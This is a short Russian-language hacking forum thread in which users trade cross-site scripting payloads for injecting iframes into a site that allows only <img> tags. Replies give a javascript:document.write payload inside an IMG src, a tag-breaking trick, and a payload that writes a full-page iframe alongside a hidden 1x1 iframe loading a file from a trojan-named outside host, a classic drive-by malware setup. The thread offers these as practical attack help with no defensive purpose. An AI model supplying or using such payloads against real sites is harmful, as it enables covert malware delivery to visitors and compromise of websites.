Iframe через XSS ...

Discussion in 'Уязвимости' started by +StArT+, 20 Sep 2007.

  1. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    Возможно ли при наличии ХSS вида:
    Code:
    <IMG SRC="javascript:alert('XSS');">
    выполнить html код, например <iframe>?

    P.S Разрешенные теги только <img> =\
    ...
     
  2. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Возможно:
    Code:
    <IMG SRC="javascript:document.write('[html код]');">

    ЗЫ все гениальное просто :)
     
    #2 Dr.Z3r0, 20 Sep 2007
    Last edited: 31 May 2011
    2 people like this.
  3. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    Спасибо оч помог, но вот еще есть одна проблема,
    при выполнении происходит редирект на пустую страницу, возможно ли этого как то избежать?
     
  4. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Это не редирект, это жаваскрипт всё стирает и создаёт вместо этого фреймы, была такаяже трабла, на форуме постали в мануал и в общем не избежать этого :)
     
  5. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    А вы не думали поставить ифрейм на страницу с XSS и на страницу которую надо проифреймить

    Например
    javascript:document.write('<iframe width=100% height=100% src="http://forum.antichat.ru/"></iframe><iframe width=1 height=1 src="http://vasyaHacker.rulez.troyan.co.ua/file.php"></iframe>');

    И вообще, если ничего не фильтруется, попробуй обойти тег, то есть:
    <IMG SRC=""><iframe.........>">

    Почитай статьи о XSS и всё поймёшь %)
     
    1 person likes this.